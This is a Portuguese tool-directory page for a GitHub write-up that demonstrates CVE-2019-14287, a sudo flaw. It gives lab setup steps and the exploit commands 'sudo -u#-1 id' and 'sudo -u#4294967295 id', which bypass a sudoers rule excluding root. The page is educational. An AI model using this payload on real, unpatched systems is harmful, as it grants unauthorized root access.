Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-14287-write-up — Demonstração passo a passo da vulnerabilidade CVE-2019-14287 do sudo que permite que usuários restritos executem comandos como root por meio de IDs de usuário manipulados. | Kitploit
Ferramentas/GitHubGitHub/gurneesh/cve-2019-14287-write-up
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e Educação
GitHubgurneesh/cve-2019-14287-write-up

CVE-2019-14287-write-up

Demonstração passo a passo da vulnerabilidade CVE-2019-14287 do sudo que permite que usuários restritos executem comandos como root por meio de IDs de usuário manipulados.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
1há 6 anosAinda não revisado

CVE-2019-14287-análise

4294967295 Falha de Sudo Permite que Usuários Restritos Executem Comandos como Root

DEMONSTRAÇÃO DA VULNERABILIDADE

Adicionar um novo usuário:

sudo su - root useradd -m -s /bin/bash testuser passwd testuser // adicione senha ao usuário visudo

Adicionar uma nova entrada

test ALL=(ALL, !root) /usr/bin/id // especificando que este usuário não pode usar o comando id com o usuário root

SALVE O ARQUIVO E SAIA DO USUÁRIO ROOT

FAÇA LOGIN COMO USUÁRIO TEST

sudo su - test

Execute o comando

sudo id VOCÊ RECEBERÁ A MENSAGEM Sorry, user test is not allowed to execute '/usr/bin/id' as root

AGORA EXECUTE O COMANDO

sudo -u#-1 id OU sudo -u#4294967295 id

E pronto, você executou o comando id como root

Baixar ferramenta